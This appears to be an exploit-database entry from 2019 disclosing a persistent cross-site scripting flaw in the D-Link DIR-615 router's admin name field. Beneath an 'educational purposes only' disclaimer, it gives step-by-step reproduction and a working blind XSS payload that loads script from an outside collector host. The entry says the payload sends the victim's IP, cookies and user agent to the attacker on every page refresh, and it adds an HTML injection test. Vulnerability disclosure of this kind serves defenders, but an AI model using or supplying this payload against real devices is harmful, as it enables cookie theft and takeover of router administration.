Exploits / Vulnerability Discovered : 2019-12-16 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Dlink dir615 wireless router? ?persistent crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
Reproduction Steps:
1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
2. Go to Maintenance page and click on Admin on the left panel
3. Put blind xss Payload in to the name field “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page.
4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
5. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage.